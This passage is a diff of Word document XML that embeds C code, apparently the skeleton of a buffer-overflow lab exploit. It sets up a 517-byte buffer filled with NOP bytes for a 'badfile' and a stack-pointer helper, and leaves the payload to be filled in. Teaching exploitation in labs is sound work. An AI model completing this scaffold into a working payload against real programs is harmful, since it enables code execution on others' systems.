+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    __</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>asm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>_(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>movl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>void</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> main(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>argc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>, char **</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>argv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>char</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> buffer[517];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    FILE *</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* Initialize buffer with 0x90 (NOP instruction) */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>memset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>&amp;buffer, 0x90, 517);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>You</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> need to fill the buffer with appropriate contents here */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
